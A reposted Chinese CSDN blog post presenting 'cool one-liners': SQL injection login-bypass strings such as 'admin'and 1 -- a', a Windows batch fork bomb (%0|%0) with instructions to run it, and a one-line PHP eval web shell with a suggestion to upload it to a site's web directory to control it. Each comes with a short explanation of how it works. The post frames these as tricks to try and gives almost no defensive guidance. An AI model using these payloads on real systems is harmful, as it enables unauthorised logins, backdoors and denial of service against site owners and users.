0


【云原生】那些看起来很牛X,原理却很简单的一行代码

「作者主页」:士别三日wyx
「作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者

1. 万能密码

没错,就是字面意思,只需要知道账号,然后输入下面这行代码:

账号'and 1 -- a

比如,很多网站的默认账号都是admin,我们就输入

admin'and 1 -- a

,密码随便写:

在这里插入图片描述
点击登录,成功登录admin账号。

在这里插入图片描述
实际上,这是SQL注入的一种利用方式,对于存在注入点的网站,都可以使用。

一般来说,登录功能的代码都是下面这种格式:

select*fromuserwhere username =''and password =''limit1,1

我们输入的账号

admin'and 1 -- a

和密码

1

,拼接到SQL里面:

select*fromuserwhere username ='admin'and1-- a' and password = '1' limit 1,1
--

是注释,注释后面的内容不参与编译:

select*fromuserwhere username ='admin'and1
1

会被转化为 True

select*fromuserwhere username ='admin'andTrue

只要存在 admin 这个账号,SQL就能查询成功,从而实现登录。

2. 万能账号

上面的代码你得知道账号,但这个你连账号都不用知道:

a' or1-- a

在账号处输入

a' or 1 -- a

,密码随便写:

在这里插入图片描述
点击登录,成功。

在这里插入图片描述
原理跟上面大同小异,也是SQL注入的一种利用方式,适用于存在注入的网站。

参数拼接到SQL以后,是下面这样:

select*fromuserwhere username ='a'or1-- a' and password = '' limit 1,1
--

注释后面不编译,

1

转换为True:

select*fromuserwhere username ='a'orTrue
or

是或的意思,两边有一个True,结果就返回True,实际执行的SQL是这样的:

select*fromuserwhereTrue

3. fork炸弹

新建一个文本文件,输入

%0|%0

在这里插入图片描述
后缀名改成

.bat

,有杀毒软件的话应该会提示,建议在虚拟机运行。

在这里插入图片描述
打开任务管理器后,双击运行。
你会看到先是CPU跑满,再是内存跑满,然后提示内存不足,然后……

原理其实很简单,就是不停的创建进程,创建速度可以参考小学三年级学过的指数增长。fork炸弹会不停的消耗资源,当资源耗尽时就会蓝屏或者黑屏,重启电脑就可以了。

提示:运行的同时执行

taskkill /f /im cmd.exe

,会有神奇的事情发生。

限制单个用户可创建的进程数上线,可以在一定程度上防止fork炸弹。

4. 一句话牧马

电影中,黑客通常会在别人电脑中植入后门程序,然后控制别人的电脑,听起来很酷对吧?实际上,最简单的后门,一行代码就够了。

以PHP为例,将包含这行代码的文件,上传到网站的web目录下:

<?php@eval($_GET['shell']);?>

访问这个文件,就能控制别人了。

原理其实很简单,地址栏访问这个文件,利用参数传递命令:

127.0.0.1/shell.php?shell='ls'

后台接收GET请求传递的参数:

<?php@eval('ls');?>

配合

@eval

函数可以执行系统命令,从而起到控制的效果。

5. 清理垃圾

PS:有粉丝反应,没有这行代码是没有灵魂的,那就再添一个吧。

很多公司在招聘员工的时候,都会要求应聘者有一定的优化能力。

当你的老板要求你优化代码,提升系统的运行效率时,就可以打出下面这行代码,获得大幅度升职加薪:

在这里插入图片描述


本文转载自: https://blog.csdn.net/wangyuxiang946/article/details/125570903
版权归原作者 士别三日wyx 所有, 如有侵权,请联系我们删除。

“【云原生】那些看起来很牛X,原理却很简单的一行代码”的评论:

还没有评论